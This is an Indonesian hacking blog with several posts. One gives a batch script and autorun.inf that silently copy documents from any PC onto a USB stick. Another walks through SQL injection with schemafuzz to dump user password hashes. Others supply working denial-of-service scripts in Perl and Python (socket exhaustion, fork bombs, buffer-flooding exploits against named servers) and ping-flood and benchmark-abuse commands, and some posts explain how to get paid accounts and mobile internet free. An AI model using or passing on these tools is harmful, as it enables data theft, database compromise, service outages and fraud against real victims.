Powered By Blogger

Merampok Data Dengan USB FlashDrive

Posted: Selasa, 04 Januari 2011 by QIWS in Label:
0

1. Buka notepad
kalau males ngetik, copas aza tulisan di bawah ini ..

@echo off

REM Name : silentxxx

REM Author : Silentxxx

Set silent=%computername% _ %random%

If not exist ”%silent%” Md “%silent%”

For%%a in (C D E F G H I J) do if exist %%a:\ (

For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\.xls’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

For /f “tokens=*” %% b in (‘dir /a/b/s%%a:/*.txt’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

For /f “tokens=*” %%b in (‘dir /a/b/s%%a:/*.docx’) do (

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

)

1. Save file tersebut dengan nama bebas .bat dan save as type all files

Sekarang coba di jalankan file dengan exstensi bat tersebut maka di samping File akan terbuat semua file yang di copy dari drive C ampai Z.

Code di atas dapat di ubah atau di tambah sesuai dengan keinginan kalian masing-masing bisa di tambahkan kode

For /f “tokens=*” %%b in (‘dir /a/b/s%%a:\*.zip’) do(

attrib –s –h –r “%%b”

copy “%%b” “%silent%” /y)

maka file yang berextensi zip akan masuk ke Flash Disk kamu
ubah sesuai extensi apa yang kamu inginkan misalnya *.pdf atau *.html

maka file terserah.bat akan berjalan sesuai dengan keinginan loe.

File tersebut bisa anda ubah ke bentuk extensi exe.,, lebih mudah.. dengan software Bat_To_Exe_ConverterV1.5 kalau belum punya bisa download di http://www/brothersoft.com/bat-to-exe-converter-50301.html

Cara mengubahnya adalah

1. Buka software tersebut..
2. Pilih yang compile
3. Dan sekarang file.bat yang tadi kita buat menjadi file yang berextensi *.exe lebih enak kan ..
4. Agar file tersebut maka kita harus buat file autorun
5. Buka notepad ketikkan

[autorun]

Open=terserah.exe

1. save as dengan nama Autorun.inf dan terserah.exe di dalam directory USB Flash Drive kamu..
2. Selesai .. Akhirnya sekarang colokkan atau masukkan FD kamu atau loe atau agan di pc mana aja akan terkcopy banyak data yang kamu terima ..

Premium Account Download-Provider.com Freee

Posted: Senin, 02 Februari 2009 by QIWS in Label:
1

Kali ini gw mu ngasih tips buat loe2 yang pada suka download..... Langsung aja target kita adalah Download-Provider.com, dimana di sana terdapat game, aplikasi, film pokonya banyak file yang bisa kita download, tapi sebelum mendownload kita selalu terbentur soalnya kita belum memiliki account Premium. Nah sekarang gw mu ngasih tips Premium Account Download-Provider.com free. Langsung aja yah :

Caranya mudah, gampang dan sangat simple :
PerTamXX kalian harus baca doa dulu (WAJIB)
Selanjutnya

1. Buka www.download-provider.com Next klik tombol sign up

2. Masukkan email Loe yg valid. dan masukkan password Loe.Bebas lah apa aja passwornya !!!

3.Dan masuk ke halaman Access Your Full Membership. Di situ ada menu Payment dan menu Account Validation. Lho ko malah di suruh bayar Shocked ... Tujuan kita kan gratis so lupain aja menu Payment... Wong tujuan kita Gratis


CATATAN : KALO LOE2 SUMUA DAH COBA TAPI KELUAR Account Wrong or etc !!! COBA TERUS,,,,, POKONYA GW JAMIN.. BAKAL BERHASIL!!!

GW BERANI TARUHAN 10 X LOE CUBA 3 X LOE GAGAL...........ARTINYA HAMPIR 70% BERHASIL

Internet Gratis Dengan Telkomsel Flash

Posted: Sabtu, 17 Januari 2009 by QIWS in Label:
0

1. Konek pake kartu simpati atau kartu AS loe dengan

APN: flash
user:
pass:

Tapi inget Username dan password Jangan diisi soalnya ga ada gunanya

2. buka software your-freedom [YF] lalu pilih protokol UDP 53 [ ngga perlu proxy ]. Kalau udah tinggal konekin aja YF nya.

3. Langkah ketiga atau yang terakhir, set proxy localhost di browser, IDM atau YM elo. Untuk yang mau pake HTTP proxy, settingnya localhost port 8080. Sementara yang mau pake socks 5 proxy, settingnya localhost port 1080.

Selamat mencuba yah

INGET JANGAN MENTANG2 GERATIS KITA MENJADI MALAS....TERUS LAH BERKREASI YAH !!

Script gado2 buat FS

Posted: Kamis, 25 Desember 2008 by QIWS in Label:
0

Fuihhh… Dah lama ga post nic, soalnya kemaren2 bgt. Ujian, ngapalin, maen, hacking (nah kalo yang ini hamper setiap hari Gw lakuin ada yang berhasil, kebanyakan sic yang gagal he…he… ) Mau cerita dulu ah boleh ya?? Begini kemarin Gw kumpul2 ma tmn2 Gw terus ada yang nanya”Qiws lo bisa mempercantik or mengubah fs Gw ga??” Jaelah Pertanyaan yang sedikit tolol sebenarnya heee…heee…. Gw jawab aza “Kalo mau mempercantik yah kesalon Non” jawaban yang simple dan sangan ga nyambung.. Langsung aja tuh teman Gw marah2. Nah semenjak kejadian ntu Gw jadi sedikit nyesel sic, kenapa dulu Gw ga bantuin aja, kali2 aja dijadiin pacar ma dia hahahahah ngarep bgt Gw. Untuk kali ini Gw mu ngasih kode2 or script2.. buat bikin yang aneh2 di FS. Langsung aja deh dunlut di sini.
http://www.2shared.com/file/4518493/387cc9f7/Script_buat_FS.html
Oya tapi maaf nic kalo yang mau make jangan asal jiplak aja yah, ganti dulu namanya edit dulu dah yang penting, solanya biar belajar kreatif gitu he..he… Eh 1 hal lagi sory ni code & script acak2kan dan kalo ada yang ga jalan mohon di maklum yah soalnya dah lama ga maenan FS. Ni merupakan koleksi Gw dulu. Sekian ah semoga bermanfaat.

Schemafuzz.py

Posted: Jumat, 19 Desember 2008 by QIWS in Label:
0

Udh lma Gw ga post lg, kali ini Gw mu ngjlasin caranya hack dengan Schemafuzz.py ahh. Tutor ni Gw peruntukan tuk shbt Gw yang pingin bgt bljr hacking, ok sob ni buat loe. Langsung aza dec .
Schemafuzz.py dibuat dengan menggunakan bahasa python Oleh siapa Gw lupa lagi sory, tapi kalo penasaran cari aja di Paman Google pasti ada. Fungsi dari Schemafuzz.py adalah memudahkan menemukan tabel dan kolom pada database sql
Supaya ga lama Gw kasih liat contonya aza dec … Liat baek-baek yah :
pertama-tama kita mari kita panjatkan puji dan syukur ke hadirat allah swt jaelah gayanya kaya yg mau pidato aja ….. just kidding. Ok pertama cari target dengan google, misalkan ditemukan: http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help Trus kita temukan sebagian perintahnya seperti ini
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol
langkah pertama
----------------
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!

langkah kedua
--------------
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]
[-] Total URL Requests 618
[-] Done

langkah ketiga
---------------
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33

[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]
[-] Total URL Requests 270
[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info
maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]
[-] Total URL Requests 3
[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs
akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]
[-] Total URL Requests 30
[-] Done

langkah selanjutnya
--------------------

cara untuk menemukan user dan password
kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password

eing ing eng....
jreennnng....keluar deh user ama passwordnya
hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]
[-] Total URL Requests 4
[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya
setelah itu tinggal kita meng crack passwordnya pake program
gemana rekan2 gampang kan pake schemafuzz
Catatan :
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

Teknik melakukan DoS part 2

Posted: by QIWS in Label:
0

Teknik melakukan DoS part 2-selesai….. nah sekarang Gw sambung lagi nih. Seperti janji Gw pada post sebelumnya. Kali ini Gw bakal kasih beberapa script untuk malakukan DoS. Yaudah langsung aja lah.

Script gs.pl (gantung socket)
#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!
Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.
1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU
#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory
#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Gw mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat terjadi secara remote jika demon (server) tidak melakukan verifikasi input sehingga input membanjiri buffer dan menyebabkan program dihentikan secara paksa. Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl
#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net
Proof of Concept:
% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT. Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat' Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.
Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --
#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan flood dan melakukan post testing. Dengan sedikit pemprograman lo dapat membuat sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas sendiri !

Teknik melakukan DoS Part 1

Posted: by QIWS in Label:
0

Teknik melakukan DoS ….. hmmm… mungkin ada yang sudah tau, tapi tips ini Gw tulis supaya kita semua lebih ngerti. Jadi kalo udah tau baca aja lagi sipa tau bisa mengtoreksi OK !!! Pertama Gw pernah ngejelasin apa itu Denial of Service (Dos) nah sekarang Gw akan nerangin gimana cara melakukan DoS. Langsung aja yac biar ga lama

DoS serangan sadis dan sangat seporadis jaelah kaya apa aja, biasanya si motif orang yang melakukan DoS bermacam-macam tapi kali ini Gw ga punya maksud apa2ko nulis ini, Cuma pengen berbagi ilmu aja. Ok next tipe2 penyerangan DoS cukup banyak diantaranya :

1. Ping Flooding

Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing"

(http://www.quadrunner.com/~chuegen/smurf.txt).

2. SYN-Flooding

SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.

3. Pentium 'FOOF' Bug

Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.

Nah sekarang Gw mu ngejelasin bagaimana caranya menyerang menggunakan exploits. Ada beberapa hal yang mesti kita tau dulu diantaranya :

A. Serangan membutuhkan Shell Linux (Unix/Comp)

B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search agar lebih mudah)

C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)

Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban.

Cara penggunaan:

A. Dapatkan file kod.c

B. Compile dengan Gcc: $ gcc -o kod kod.c

C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]

Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target (misalmya: blocking)

2. BONK/BOINK

Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT

3. Jolt

Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.

4. NesTea

Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2

5. NewTear

Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)

6. Syndrop

Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows

7. TearDrop

TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung

ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood

Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran. bash # ping -fs 65000 [ip_target]

2. Apache Benchmark

Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melakukan penyalahgunaan. bash $ /usr/sbin/ab -n 10000 -c 300 \ http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum (diketik dalam 1 baris!) Akan melakukan 10000 request paralel 300 kepada host korban.com

3. Menggantung Socket

Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah. Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas. Nah segitu aja penjelasan dari Gw. Next time Gw bakal kasih liat beberapa contoh Script untuk melakukan DoS. Soalnya sekarang Gw ngantuk bgt. Ok sekian dulu untuh hari ini besok di sambung lagi Gw mu po2 dulu nic.